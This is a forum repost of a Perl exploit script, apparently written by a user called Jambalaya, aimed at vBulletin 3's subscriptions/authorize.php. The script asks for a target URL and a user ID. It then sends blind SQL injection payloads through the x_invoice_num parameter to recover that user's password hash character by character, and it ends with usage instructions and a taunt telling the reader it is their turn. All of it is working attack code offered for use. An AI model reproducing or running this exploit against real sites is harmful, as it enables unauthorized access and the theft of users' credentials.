信息来源:ITS
文章作者:Jambalaya
复制内容到剪贴板
代码:
#use strict;
#vbb的那个程序,自己写的一个利用工具
#vbb3不止这一个漏洞哦
use LWP;
use HTTP::Request::Common;
print "\n #####################################################\n";
print " Exploit of VBB3's authorize.php\n";
print " Codz By Jambalaya \n";
print " website: [url]www.itaq.org[/url] \n";
print " Give my best wishs to Bytes and his girlfriend--luze \n";
print " #####################################################\n\n";
&usage;
print "\nplease input the url you wannt attack:\n";
$url=<>;
chomp($url);
#print $url;
#$url = '[url]http://192.168.0.13/myhome/newvbb/subscriptions/authorize.php[/url]';
#$id=1;
print "input the userid you wanna attack:\n";
$id=<>;
chomp($id);
#print $id;
my $agent = LWP::UserAgent->new;
@jam1=(48..57);
@jam2=(97..102);
@jam=(@jam1,@jam2);
print "\nAttacking>>>please wait,I need time!!\n\n";
for($i=1;$i<=32;$i++)
{
for ($j=0;$j<=@jam;$j++)
{
my $res = $agent->post($url, {x_MD5_Hash=>'D41D8CD98F00B204E9800998ECF8427E',x_response_code=>'1',x_invoice_num=>"1_$id and ord(substring(password, $i,1))=$jam[$j]_1"});
#$id%20and%20ord(substring(password,1,1)=57_1"});
if ($res->content =~ m/付款完成/)
{
print "$i>>>\n";
$nowpass=chr($jam[$j]);
print "the $i of password is $nowpass\n";
$passwd.=chr($jam[$j]);
}
}
}
if ($passwd eq "")
{
print "Oh,My boy! I failed,please don't cry~~~~~\n";
}
else
{
print " the password of the userid=$id is $passwd\n\n";
print "Now! it 's your turn ,isn't ? \n";
}
sub usage {
print qq~
Usage:
1.for url
wanna attack website is [url]http://192.168.0.13/myhome/vbb3/[/url]\index.php
inputing is [url]http://192.168.0.13/myhome/vbb3/subscripti...s/authorize.php[/url]
2.for userid
(I wanna attack user named Jambalaya, his userid is 1,so inputing is 1)
3.please make sure it is up verion 3.0
~;
}
